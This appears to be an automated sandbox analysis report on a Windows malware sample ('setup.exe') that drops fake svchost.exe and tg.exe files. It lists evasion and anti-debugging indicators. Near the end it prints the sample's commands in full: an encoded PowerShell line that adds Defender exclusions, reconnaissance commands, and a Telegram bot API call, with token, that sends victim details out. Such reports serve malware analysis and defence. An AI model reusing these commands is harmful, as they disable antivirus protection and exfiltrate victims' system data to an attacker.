        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\svchost\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\ProgramData\svchost\svchost.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_10-10524
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4873
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 416
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Window / User API: threadDelayed 5773
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Window / User API: threadDelayed 4221
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2620
        Source: C:\ProgramData\svchost\svchost.exe Window / User API: threadDelayed 7908
        Source: C:\ProgramData\svchost\svchost.exe Window / User API: threadDelayed 2091
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2767
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2075
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 820
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 900
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 468
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 589
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4092
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4459
        Source: C:\ProgramData\svchost\svchost.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_10-9360
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_7-9052
        Source: C:\ProgramData\svchost\svchost.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_10-9609
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676 Thread sleep count: 5773 > 30
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676 Thread sleep time: -144325s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676 Thread sleep count: 4221 > 30
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676 Thread sleep time: -105525s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep count: 2620 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep count: 147 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308 Thread sleep count: 7908 > 30
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308 Thread sleep time: -158160s >= -30000s
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308 Thread sleep count: 2091 > 30
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308 Thread sleep time: -41820s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588 Thread sleep count: 2767 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 2075 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 Thread sleep time: -12912720851596678s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7760 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep count: 820 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 209 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980 Thread sleep count: 900 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep count: 468 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep count: 589 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep count: 4092 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140 Thread sleep count: 4459 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188 Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\ProgramData\svchost\svchost.exe Last function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Thread sleep count: Count: 5773 delay: -25
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Thread sleep count: Count: 4221 delay: -25
        Source: C:\ProgramData\svchost\svchost.exe Thread sleep count: Count: 7908 delay: -20
        Source: C:\ProgramData\svchost\svchost.exe Thread sleep count: Count: 2091 delay: -20
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669ACA9C0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669AB341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669ADEBE0 FindFirstFileExA
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669AD106C VirtualQuery,GetSystemInfo
        Source: C:\Users\user\AppData\Local\Temp\tg.exe File opened: C:\Users\user\AppData\Local\
        Source: C:\Users\user\AppData\Local\Temp\tg.exe File opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp
        Source: C:\Users\user\AppData\Local\Temp\tg.exe File opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.tmp
        Source: C:\Users\user\AppData\Local\Temp\tg.exe File opened: C:\Users\user\AppData\
        Source: C:\Users\user\AppData\Local\Temp\tg.exe File opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp
        Source: C:\Users\user\AppData\Local\Temp\tg.exe File opened: C:\Users\user\
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe API call chain: ExitProcess graph end node graph_3-27765
        Source: C:\ProgramData\svchost\svchost.exe API call chain: ExitProcess graph end node graph_10-9583
        Source: C:\ProgramData\svchost\svchost.exe API call chain: ExitProcess graph end node graph_10-9718
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

        Anti Debugging

        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_004014A0 GetCurrentProcess,CheckRemoteDebuggerPresent
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_00401090 NtSetInformationThread ?,00000011,00000000,00000000
        Source: C:\ProgramData\svchost\svchost.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep graph_10-9365
        Source: C:\ProgramData\svchost\svchost.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep graph_10-9363
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Thread information set: HideFromDebugger
        Source: C:\ProgramData\svchost\svchost.exe Thread information set: HideFromDebugger
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Process queried: DebugPort
        Source: C:\ProgramData\svchost\svchost.exe Process queried: DebugPort
        Source: C:\ProgramData\svchost\svchost.exe Process queried: DebugObjectHandle
        Source: C:\ProgramData\svchost\svchost.exe Process queried: DebugFlags
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669AD2BB0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Code function: 4_2_0040A83A LoadLibraryW,GetProcAddress,wcscpy,wcscat,wcslen,CoTaskMemFree,FreeLibrary,wcscat,wcslen
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_0040DEB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_00405670 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_00405E10 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_00405B10 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_004013D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_004013A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00405B10 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00405670 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_0040DEB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_004013D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_004013A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00405E10 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_0040DEB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_00405B10 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_00405670 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_00405E10 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_004013D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_004013A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669ADFC60 GetProcessHeap
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00401515 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669AD2D90 SetUnhandledExceptionFilter
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669AD1F80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FF669AD6628 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Code function: 4_2_00409950 SetUnhandledExceptionFilter
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Code function: 4_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_0041140E SetUnhandledExceptionFilter
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_0040E542 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_00410954 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00410954 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_0041140E SetUnhandledExceptionFilter
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_0040E542 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_0041140E SetUnhandledExceptionFilter
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_0040E542 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_00410954 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

        HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\setup.exe | Process created: Base64 decoded <#byq#>Add-MpPreference <#gnp#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uei#> -Force <#cdf#>
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FF669ACA9C0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669ACA9C0
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\tg.exe "C:\Users\user\AppData\Local\Temp\tg.exe"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\client.exe "C:\Users\user\AppData\Local\Temp\client.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\tg.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
